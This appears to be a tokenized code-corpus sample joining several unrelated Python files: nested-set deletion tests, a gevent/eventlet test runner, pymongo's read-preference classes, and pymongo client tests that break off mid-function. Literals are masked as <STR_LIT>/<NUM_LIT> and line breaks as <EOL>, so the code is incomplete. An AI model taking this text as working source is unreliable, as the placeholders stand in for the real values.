<EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT:9> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : 
<NUM_LIT:10> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> def test_combined_del_123 ( self ) : <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . commit ( ) <EOL> self . assertEqual ( get_tree_details ( ) , self . combined_del_result ) <EOL> def test_combined_del_132 ( self ) : <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . commit ( ) <EOL> self . assertEqual ( get_tree_details ( ) , self . combined_del_result ) <EOL> def test_combined_del_213 ( self ) : <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . commit ( ) <EOL> self . assertEqual ( get_tree_details ( ) , self . 
combined_del_result ) <EOL> def test_combined_del_231 ( self ) : <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . commit ( ) <EOL> self . assertEqual ( get_tree_details ( ) , self . combined_del_result ) <EOL> def test_combined_del_312 ( self ) : <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . commit ( ) <EOL> self . assertEqual ( get_tree_details ( ) , self . combined_del_result ) <EOL> def test_combined_del_321 ( self ) : <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . delete ( <EOL> db . session . query ( Named ) . filter_by ( name = u"<STR_LIT>" ) . one ( ) ) <EOL> db . session . commit ( ) <EOL> self . assertEqual ( get_tree_details ( ) , self . combined_del_result ) <EOL> def suite ( ) : <EOL> suite = unittest . TestSuite ( ) <EOL> suite . addTest ( unittest . makeSuite ( DeletionTestCase ) ) <EOL> return suite </s>
<s> """<STR_LIT>""" <EOL> import getopt <EOL> import sys <EOL> def run_gevent ( ) : <EOL> """<STR_LIT>""" <EOL> from gevent import monkey <EOL> monkey . patch_all ( ) <EOL> def run_eventlet ( ) : <EOL> """<STR_LIT>""" <EOL> import eventlet <EOL> eventlet . monkey_patch ( ) <EOL> FRAMEWORKS = { <EOL> '<STR_LIT>' : run_gevent , <EOL> '<STR_LIT>' : run_eventlet , <EOL> } <EOL> def list_frameworks ( ) : <EOL> """<STR_LIT>""" <EOL> sys . stdout . write ( """<STR_LIT>""" % "<STR_LIT:U+002CU+0020>" . join ( sorted ( FRAMEWORKS ) ) ) <EOL> def run ( framework_name , * args ) : <EOL> """<STR_LIT>""" <EOL> FRAMEWORKS [ framework_name ] ( ) <EOL> sys . argv [ : ] = [ '<STR_LIT>' , '<STR_LIT:test>' ] + list ( args ) <EOL> import setup <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> usage = """<STR_LIT>""" % ( sys . argv [ <NUM_LIT:0> ] , sys . argv [ <NUM_LIT:0> ] ) <EOL> try : <EOL> opts , args = getopt . getopt ( <EOL> sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT:h>" , [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> except getopt . GetoptError as err : <EOL> print ( str ( err ) ) <EOL> print ( usage ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> for option_name , _ in opts : <EOL> if option_name in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> print ( usage ) <EOL> sys . exit ( ) <EOL> elif option_name == "<STR_LIT>" : <EOL> list_frameworks ( ) <EOL> sys . exit ( ) <EOL> else : <EOL> assert False , "<STR_LIT>" <EOL> if not args : <EOL> print ( usage ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if args [ <NUM_LIT:0> ] not in FRAMEWORKS : <EOL> print ( '<STR_LIT>' % args [ <NUM_LIT:0> ] ) <EOL> list_frameworks ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> run ( args [ <NUM_LIT:0> ] , <EOL> * args [ <NUM_LIT:1> : ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from collections import Mapping <EOL> from pymongo . errors import ConfigurationError <EOL> from pymongo . server_selectors import ( member_with_tags_server_selector , <EOL> secondary_with_tags_server_selector , <EOL> writable_server_selector ) <EOL> _PRIMARY = <NUM_LIT:0> <EOL> _PRIMARY_PREFERRED = <NUM_LIT:1> <EOL> _SECONDARY = <NUM_LIT:2> <EOL> _SECONDARY_PREFERRED = <NUM_LIT:3> <EOL> _NEAREST = <NUM_LIT:4> <EOL> _MONGOS_MODES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> def _validate_tag_sets ( tag_sets ) : <EOL> """<STR_LIT>""" <EOL> if tag_sets is None : <EOL> return tag_sets <EOL> if not isinstance ( tag_sets , list ) : <EOL> raise TypeError ( ( <EOL> "<STR_LIT>" ) % ( tag_sets , ) ) <EOL> if len ( tag_sets ) == <NUM_LIT:0> : <EOL> raise ValueError ( ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) % ( tag_sets , ) ) <EOL> for tags in tag_sets : <EOL> if not isinstance ( tags , Mapping ) : <EOL> raise TypeError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( tags , ) ) <EOL> return tag_sets <EOL> class _ServerMode ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> def __init__ ( self , mode , tag_sets = None ) : <EOL> if mode == _PRIMARY and tag_sets is not None : <EOL> raise ConfigurationError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . __mongos_mode = _MONGOS_MODES [ mode ] <EOL> self . __mode = mode <EOL> self . __tag_sets = _validate_tag_sets ( tag_sets ) <EOL> @ property <EOL> def name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __class__ . __name__ <EOL> @ property <EOL> def document ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . __tag_sets in ( None , [ { } ] ) : <EOL> return { '<STR_LIT>' : self . __mongos_mode } <EOL> return { '<STR_LIT>' : self . __mongos_mode , '<STR_LIT>' : self . __tag_sets } <EOL> @ property <EOL> def mode ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . 
__mode <EOL> @ property <EOL> def tag_sets ( self ) : <EOL> """<STR_LIT>""" <EOL> return list ( self . __tag_sets ) if self . __tag_sets else [ { } ] <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( <EOL> self . name , self . __tag_sets ) <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , _ServerMode ) : <EOL> return ( self . mode == other . mode and <EOL> self . tag_sets == other . tag_sets ) <EOL> return NotImplemented <EOL> def __ne__ ( self , other ) : <EOL> return not self == other <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : self . __mode , '<STR_LIT>' : self . __tag_sets } <EOL> def __setstate__ ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . __mode = value [ '<STR_LIT>' ] <EOL> self . __mongos_mode = _MONGOS_MODES [ self . __mode ] <EOL> self . __tag_sets = _validate_tag_sets ( value [ '<STR_LIT>' ] ) <EOL> class Primary ( _ServerMode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( Primary , self ) . __init__ ( _PRIMARY ) <EOL> def __call__ ( self , server_descriptions ) : <EOL> """<STR_LIT>""" <EOL> return writable_server_selector ( server_descriptions ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , _ServerMode ) : <EOL> return other . mode == _PRIMARY <EOL> return NotImplemented <EOL> class PrimaryPreferred ( _ServerMode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tag_sets = None ) : <EOL> super ( PrimaryPreferred , self ) . __init__ ( _PRIMARY_PREFERRED , tag_sets ) <EOL> def __call__ ( self , server_descriptions ) : <EOL> """<STR_LIT>""" <EOL> writable_servers = writable_server_selector ( server_descriptions ) <EOL> if writable_servers : <EOL> return writable_servers <EOL> else : <EOL> return secondary_with_tags_server_selector ( <EOL> self . 
tag_sets , <EOL> server_descriptions ) <EOL> class Secondary ( _ServerMode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tag_sets = None ) : <EOL> super ( Secondary , self ) . __init__ ( _SECONDARY , tag_sets ) <EOL> def __call__ ( self , server_descriptions ) : <EOL> """<STR_LIT>""" <EOL> return secondary_with_tags_server_selector ( <EOL> self . tag_sets , <EOL> server_descriptions ) <EOL> class SecondaryPreferred ( _ServerMode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tag_sets = None ) : <EOL> super ( SecondaryPreferred , self ) . __init__ ( _SECONDARY_PREFERRED , tag_sets ) <EOL> def __call__ ( self , server_descriptions ) : <EOL> """<STR_LIT>""" <EOL> secondaries = secondary_with_tags_server_selector ( <EOL> self . tag_sets , <EOL> server_descriptions ) <EOL> if secondaries : <EOL> return secondaries <EOL> else : <EOL> return writable_server_selector ( server_descriptions ) <EOL> class Nearest ( _ServerMode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tag_sets = None ) : <EOL> super ( Nearest , self ) . __init__ ( _NEAREST , tag_sets ) <EOL> def __call__ ( self , server_descriptions ) : <EOL> """<STR_LIT>""" <EOL> return member_with_tags_server_selector ( <EOL> self . 
tag_sets or [ { } ] , <EOL> server_descriptions ) <EOL> _ALL_READ_PREFERENCES = ( Primary , PrimaryPreferred , <EOL> Secondary , SecondaryPreferred , Nearest ) <EOL> def make_read_preference ( mode , tag_sets ) : <EOL> if mode == _PRIMARY : <EOL> if tag_sets not in ( None , [ { } ] ) : <EOL> raise ConfigurationError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return Primary ( ) <EOL> return _ALL_READ_PREFERENCES [ mode ] ( tag_sets ) <EOL> _MODES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> class ReadPreference ( object ) : <EOL> """<STR_LIT>""" <EOL> PRIMARY = Primary ( ) <EOL> PRIMARY_PREFERRED = PrimaryPreferred ( ) <EOL> SECONDARY = Secondary ( ) <EOL> SECONDARY_PREFERRED = SecondaryPreferred ( ) <EOL> NEAREST = Nearest ( ) <EOL> def read_pref_mode_from_name ( name ) : <EOL> """<STR_LIT>""" <EOL> return _MONGOS_MODES . index ( name ) <EOL> class MovingAverage ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . average = None <EOL> def add_sample ( self , sample ) : <EOL> if sample < <NUM_LIT:0> : <EOL> return <EOL> if self . average is None : <EOL> self . average = sample <EOL> else : <EOL> self . average = <NUM_LIT> * self . average + <NUM_LIT> * sample <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . average <EOL> def reset ( self ) : <EOL> self . average = None </s>
<s> """<STR_LIT>""" <EOL> import contextlib <EOL> import datetime <EOL> import os <EOL> import socket <EOL> import struct <EOL> import sys <EOL> import time <EOL> import traceback <EOL> import warnings <EOL> sys . path [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ "<STR_LIT>" ] <EOL> from bson import BSON <EOL> from bson . codec_options import CodecOptions <EOL> from bson . py3compat import thread , u <EOL> from bson . son import SON <EOL> from bson . tz_util import utc <EOL> from pymongo import auth , message <EOL> from pymongo . cursor import CursorType <EOL> from pymongo . database import Database <EOL> from pymongo . errors import ( AutoReconnect , <EOL> ConfigurationError , <EOL> ConnectionFailure , <EOL> InvalidName , <EOL> OperationFailure , <EOL> CursorNotFound , <EOL> NetworkTimeout , <EOL> InvalidURI ) <EOL> from pymongo . message import _CursorAddress <EOL> from pymongo . mongo_client import MongoClient <EOL> from pymongo . pool import SocketInfo <EOL> from pymongo . read_preferences import ReadPreference <EOL> from pymongo . server_selectors import ( any_server_selector , <EOL> writable_server_selector ) <EOL> from pymongo . server_type import SERVER_TYPE <EOL> from pymongo . write_concern import WriteConcern <EOL> from test import ( client_context , <EOL> client_knobs , <EOL> host , <EOL> pair , <EOL> port , <EOL> SkipTest , <EOL> unittest , <EOL> IntegrationTest , <EOL> db_pwd , <EOL> db_user , <EOL> MockClientTest ) <EOL> from test . pymongo_mocks import MockClient <EOL> from test . utils import ( assertRaisesExactly , <EOL> delay , <EOL> remove_all_users , <EOL> server_is_master_with_slave , <EOL> get_pool , <EOL> one , <EOL> connected , <EOL> wait_until , <EOL> rs_or_single_client , <EOL> rs_or_single_client_noauth , <EOL> lazy_client_trial , <EOL> NTHREADS ) <EOL> class ClientUnitTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . 
client = MongoClient ( host , port , connect = False , <EOL> serverSelectionTimeoutMS = <NUM_LIT:100> ) <EOL> def test_keyword_arg_defaults ( self ) : <EOL> client = MongoClient ( socketTimeoutMS = None , <EOL> connectTimeoutMS = <NUM_LIT> , <EOL> waitQueueTimeoutMS = None , <EOL> waitQueueMultiple = None , <EOL> socketKeepAlive = False , <EOL> replicaSet = None , <EOL> read_preference = ReadPreference . PRIMARY , <EOL> ssl = False , <EOL> ssl_keyfile = None , <EOL> ssl_certfile = None , <EOL> ssl_cert_reqs = <NUM_LIT:0> , <EOL> ssl_ca_certs = None , <EOL> connect = False , <EOL> serverSelectionTimeoutMS = <NUM_LIT> ) <EOL> options = client . _MongoClient__options <EOL> pool_opts = options . pool_options <EOL> self . assertEqual ( None , pool_opts . socket_timeout ) <EOL> self . assertEqual ( <NUM_LIT> , pool_opts . connect_timeout ) <EOL> self . assertEqual ( None , pool_opts . wait_queue_timeout ) <EOL> self . assertEqual ( None , pool_opts . wait_queue_multiple ) <EOL> self . assertFalse ( pool_opts . socket_keepalive ) <EOL> self . assertEqual ( None , pool_opts . ssl_context ) <EOL> self . assertEqual ( None , options . replica_set_name ) <EOL> self . assertEqual ( ReadPreference . PRIMARY , client . read_preference ) <EOL> self . assertAlmostEqual ( <NUM_LIT:12> , client . server_selection_timeout ) <EOL> def test_types ( self ) : <EOL> self . assertRaises ( TypeError , MongoClient , <NUM_LIT:1> ) <EOL> self . assertRaises ( TypeError , MongoClient , <NUM_LIT> ) <EOL> self . assertRaises ( TypeError , MongoClient , "<STR_LIT:localhost>" , "<STR_LIT>" ) <EOL> self . assertRaises ( TypeError , MongoClient , "<STR_LIT:localhost>" , <NUM_LIT> ) <EOL> self . assertRaises ( TypeError , MongoClient , "<STR_LIT:localhost>" , [ ] ) <EOL> self . assertRaises ( ConfigurationError , MongoClient , [ ] ) <EOL> def test_max_pool_size_zero ( self ) : <EOL> with self . 
assertRaises ( ValueError ) : <EOL> MongoClient ( maxPoolSize = <NUM_LIT:0> ) <EOL> def test_get_db ( self ) : <EOL> def make_db ( base , name ) : <EOL> return base [ name ] <EOL> self . assertRaises ( InvalidName , make_db , self . client , "<STR_LIT>" ) <EOL> self . assertRaises ( InvalidName , make_db , self . client , "<STR_LIT>" ) <EOL> self . assertRaises ( InvalidName , make_db , self . client , "<STR_LIT>" ) <EOL> self . assertRaises ( InvalidName , make_db , self . client , "<STR_LIT>" ) <EOL> self . assertRaises ( InvalidName , make_db , self . client , "<STR_LIT>" ) <EOL> self . assertRaises ( InvalidName , make_db , self . client , "<STR_LIT>" ) <EOL> self . assertTrue ( isinstance ( self . client . test , Database ) ) <EOL> self . assertEqual ( self . client . test , self . client [ "<STR_LIT:test>" ] ) <EOL> self . assertEqual ( self . client . test , Database ( self . client , "<STR_LIT:test>" ) ) <EOL> def test_get_database ( self ) : <EOL> codec_options = CodecOptions ( tz_aware = True ) <EOL> write_concern = WriteConcern ( w = <NUM_LIT:2> , j = True ) <EOL> db = self . client . get_database ( <EOL> '<STR_LIT:foo>' , codec_options , ReadPreference . SECONDARY , write_concern ) <EOL> self . assertEqual ( '<STR_LIT:foo>' , db . name ) <EOL> self . assertEqual ( codec_options , db . codec_options ) <EOL> self . assertEqual ( ReadPreference . SECONDARY , db . read_preference ) <EOL> self . assertEqual ( write_concern , db . write_concern ) <EOL> def test_getattr ( self ) : <EOL> self . assertTrue ( isinstance ( self . client [ '<STR_LIT>' ] , Database ) ) <EOL> with self . assertRaises ( AttributeError ) as context : <EOL> self . client . _does_not_exist <EOL> self . assertIn ( "<STR_LIT>" , <EOL> str ( context . exception ) ) <EOL> def test_iteration ( self ) : <EOL> def iterate ( ) : <EOL> [ a for a in self . client ] <EOL> self . 
assertRaises ( TypeError , iterate ) <EOL> def test_get_default_database ( self ) : <EOL> c = MongoClient ( "<STR_LIT>" % ( host , port ) , connect = False ) <EOL> self . assertEqual ( Database ( c , '<STR_LIT:foo>' ) , c . get_default_database ( ) ) <EOL> def test_get_default_database_error ( self ) : <EOL> c = MongoClient ( "<STR_LIT>" % ( host , port ) , connect = False ) <EOL> self . assertRaises ( ConfigurationError , c . get_default_database ) <EOL> def test_get_default_database_with_authsource ( self ) : <EOL> uri = "<STR_LIT>" % ( host , port ) <EOL> c = MongoClient ( uri , connect = False ) <EOL> self . assertEqual ( Database ( c , '<STR_LIT:foo>' ) , c . get_default_database ( ) ) <EOL> class TestClient ( IntegrationTest ) : <EOL> def test_constants ( self ) : <EOL> MongoClient . HOST = "<STR_LIT>" <EOL> MongoClient . PORT = <NUM_LIT> <EOL> with self . assertRaises ( AutoReconnect ) : <EOL> connected ( MongoClient ( serverSelectionTimeoutMS = <NUM_LIT:10> ) ) <EOL> connected ( MongoClient ( host , port ) ) <EOL> MongoClient . HOST = host <EOL> MongoClient . PORT = port <EOL> connected ( MongoClient ( ) ) <EOL> def test_init_disconnected ( self ) : <EOL> c = rs_or_single_client ( connect = False ) <EOL> self . assertIsInstance ( c . is_primary , bool ) <EOL> c = rs_or_single_client ( connect = False ) <EOL> self . assertIsInstance ( c . is_mongos , bool ) <EOL> c = rs_or_single_client ( connect = False ) <EOL> self . assertIsInstance ( c . max_pool_size , int ) <EOL> self . assertIsInstance ( c . nodes , frozenset ) <EOL> c = rs_or_single_client ( connect = False ) <EOL> self . assertEqual ( c . codec_options , CodecOptions ( ) ) <EOL> self . assertIsInstance ( c . max_bson_size , int ) <EOL> c = rs_or_single_client ( connect = False ) <EOL> self . assertFalse ( c . primary ) <EOL> self . assertFalse ( c . secondaries ) <EOL> c = rs_or_single_client ( connect = False ) <EOL> self . assertIsInstance ( c . 
max_write_batch_size , int ) <EOL> if client_context . is_rs : <EOL> self . assertIsNotNone ( c . address ) <EOL> else : <EOL> self . assertEqual ( c . address , ( host , port ) ) <EOL> bad_host = "<STR_LIT>" <EOL> c = MongoClient ( bad_host , port , connectTimeoutMS = <NUM_LIT:1> , <EOL> serverSelectionTimeoutMS = <NUM_LIT:10> ) <EOL> self . assertRaises ( ConnectionFailure , c . pymongo_test . test . find_one ) <EOL> def test_init_disconnected_with_auth ( self ) : <EOL> uri = "<STR_LIT>" <EOL> c = MongoClient ( uri , connectTimeoutMS = <NUM_LIT:1> , <EOL> serverSelectionTimeoutMS = <NUM_LIT:10> ) <EOL> self . assertRaises ( ConnectionFailure , c . pymongo_test . test . find_one ) <EOL> def test_equality ( self ) : <EOL> c = connected ( rs_or_single_client ( ) ) <EOL> self . assertEqual ( client_context . rs_or_standalone_client , c ) <EOL> self . assertFalse ( client_context . rs_or_standalone_client != c ) <EOL> def test_host_w_port ( self ) : <EOL> with self . assertRaises ( ValueError ) : <EOL> connected ( MongoClient ( "<STR_LIT>" % host , connectTimeoutMS = <NUM_LIT:1> , <EOL> serverSelectionTimeoutMS = <NUM_LIT:10> ) ) <EOL> def test_repr ( self ) : <EOL> import bson <EOL> client = MongoClient ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> connect = False , document_class = SON ) <EOL> the_repr = repr ( client ) <EOL> self . assertIn ( '<STR_LIT>' , the_repr ) <EOL> self . assertIn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> the_repr ) <EOL> self . assertIn ( "<STR_LIT>" , the_repr ) <EOL> self . assertIn ( "<STR_LIT>" , the_repr ) <EOL> self . assertEqual ( eval ( the_repr ) , client ) <EOL> @ client_context . require_replica_set <EOL> def test_repr_replica_set ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , repr ( self . client ) ) <EOL> self . assertIn ( pair , repr ( self . client ) ) <EOL> def test_getters ( self ) : <EOL> self . assertEqual ( client_context . client . address , ( host , port ) ) <EOL> self . 
assertEqual ( client_context . nodes , self . client . nodes ) <EOL> def test_database_names ( self ) : <EOL> self . client . pymongo_test . test . insert_one ( { "<STR_LIT>" : u ( "<STR_LIT:object>" ) } ) <EOL> self . client . pymongo_test_mike . test . insert_one ( { "<STR_LIT>" : u ( "<STR_LIT:object>" ) } ) <EOL> dbs = self . client . database_names ( ) <EOL> self . assertTrue ( "<STR_LIT>" in dbs ) <EOL> self . assertTrue ( "<STR_LIT>" in dbs ) <EOL> def test_drop_database ( self ) : <EOL> self . assertRaises ( TypeError , self . client . drop_database , <NUM_LIT:5> ) <EOL> self . assertRaises ( TypeError , self . client . drop_database , None ) <EOL> self . client . pymongo_test . test . insert_one ( { "<STR_LIT>" : u ( "<STR_LIT:object>" ) } ) <EOL> self . client . pymongo_test2 . test . insert_one ( { "<STR_LIT>" : u ( "<STR_LIT:object>" ) } ) <EOL> dbs = self . client . database_names ( ) <EOL> self . assertIn ( "<STR_LIT>" , dbs ) <EOL> self . assertIn ( "<STR_LIT>" , dbs ) <EOL> self . client . drop_database ( "<STR_LIT>" ) <EOL> self . client . drop_database ( self . client . pymongo_test2 ) <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> dbs = self . client . database_names ( ) <EOL> self . assertNotIn ( "<STR_LIT>" , dbs ) <EOL> self . assertNotIn ( "<STR_LIT>" , dbs ) <EOL> def test_close ( self ) : <EOL> coll = self . client . pymongo_test . bar <EOL> self . client . close ( ) <EOL> self . client . close ( ) <EOL> coll . count ( ) <EOL> self . client . close ( ) <EOL> self . client . close ( ) <EOL> coll . count ( ) <EOL> def test_bad_uri ( self ) : <EOL> with self . assertRaises ( InvalidURI ) : <EOL> MongoClient ( "<STR_LIT>" ) <EOL> @ client_context . require_auth <EOL> def test_auth_from_uri ( self ) : <EOL> self . client . admin . add_user ( "<STR_LIT>" , "<STR_LIT>" , roles = [ "<STR_LIT:root>" ] ) <EOL> self . addCleanup ( self . client . admin . remove_user , '<STR_LIT>' ) <EOL> self . addCleanup ( remove_all_users , self . client . 
pymongo_test ) <EOL> self . client . pymongo_test . add_user ( <EOL> "<STR_LIT:user>" , "<STR_LIT>" , roles = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with self . assertRaises ( OperationFailure ) : <EOL> connected ( rs_or_single_client ( <EOL> "<STR_LIT>" % ( host , port ) ) ) <EOL> connected ( rs_or_single_client_noauth ( <EOL> "<STR_LIT>" % ( host , port ) ) ) <EOL> uri = "<STR_LIT>" % ( host , port ) <EOL> with self . assertRaises ( OperationFailure ) : <EOL> connected ( rs_or_single_client ( uri ) ) <EOL> connected ( rs_or_single_client_noauth ( <EOL> "<STR_LIT>" % ( host , port ) ) ) <EOL> rs_or_single_client ( <EOL> "<STR_LIT>" % ( host , port ) , <EOL> connect = False ) . pymongo_test . test . find_one ( ) <EOL> bad_client = rs_or_single_client ( <EOL> "<STR_LIT>" % ( host , port ) , <EOL> connect = False ) <EOL> self . assertRaises ( OperationFailure , <EOL> bad_client . pymongo_test . test . find_one ) <EOL> @ client_context . require_auth <EOL> def test_multiple_logins ( self ) : <EOL> self . client . pymongo_test . add_user ( '<STR_LIT>' , '<STR_LIT>' , roles = [ '<STR_LIT>' ] ) <EOL> self . client . pymongo_test . add_user ( '<STR_LIT>' , '<STR_LIT>' , roles = [ '<STR_LIT>' ] ) <EOL> self . addCleanup ( remove_all_users , self . client . pymongo_test ) <EOL> client = rs_or_single_client_noauth ( <EOL> "<STR_LIT>" % ( host , port ) ) <EOL> client . pymongo_test . test . find_one ( ) <EOL> with self . assertRaises ( OperationFailure ) : <EOL> client . pymongo_test . authenticate ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> client . pymongo_test . test . find_one ( ) <EOL> client . pymongo_test . logout ( ) <EOL> with self . assertRaises ( OperationFailure ) : <EOL> client . pymongo_test . test . find_one ( ) <EOL> client . pymongo_test . authenticate ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> client . pymongo_test . test . find_one ( ) <EOL> with self . assertRaises ( OperationFailure ) : <EOL> client . pymongo_test . 
authenticate ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> client . pymongo_test . test . find_one ( ) <EOL> @ client_context . require_auth <EOL> def test_lazy_auth_raises_operation_failure ( self ) : <EOL> lazy_client = rs_or_single_client ( <EOL> "<STR_LIT>" % host , connect = False ) <EOL> assertRaisesExactly ( <EOL> OperationFailure , lazy_client . test . collection . find_one ) <EOL> def test_unix_socket ( self ) : <EOL> if not hasattr ( socket , "<STR_LIT>" ) : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> mongodb_socket = '<STR_LIT>' <EOL> encoded_socket = '<STR_LIT>' <EOL> if not os . access ( mongodb_socket , os . R_OK ) : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> if client_context . auth_enabled : <EOL> uri = "<STR_LIT>" % ( db_user , db_pwd , encoded_socket ) <EOL> else : <EOL> uri = "<STR_LIT>" % encoded_socket <EOL> client = MongoClient ( uri ) <EOL> client . pymongo_test . test . insert_one ( { "<STR_LIT>" : "<STR_LIT:object>" } ) <EOL> dbs = client . database_names ( ) <EOL> self . assertTrue ( "<STR_LIT>" in dbs ) <EOL> self . assertRaises ( <EOL> ConnectionFailure , <EOL> connected , MongoClient ( "<STR_LIT>" , <EOL> serverSelectionTimeoutMS = <NUM_LIT:100> ) ) <EOL> def test_fork ( self ) : <EOL> if sys . platform == "<STR_LIT:win32>" : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> try : <EOL> import multiprocessing <EOL> except ImportError : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> db = self . client . pymongo_test <EOL> db . test . find_one ( ) <EOL> def f ( pipe ) : <EOL> try : <EOL> kill_cursors_executor = self . client . _kill_cursors_executor <EOL> servers = self . client . _topology . select_servers ( <EOL> any_server_selector ) <EOL> db . test . find_one ( ) <EOL> wait_until ( <EOL> lambda : all ( s . _monitor . _executor . _thread . is_alive ( ) <EOL> for s in servers ) , <EOL> "<STR_LIT>" ) <EOL> wait_until ( lambda : kill_cursors_executor . _thread . is_alive ( ) , <EOL> "<STR_LIT>" ) <EOL> except : <EOL> traceback . print_exc ( ) <EOL> pipe . 
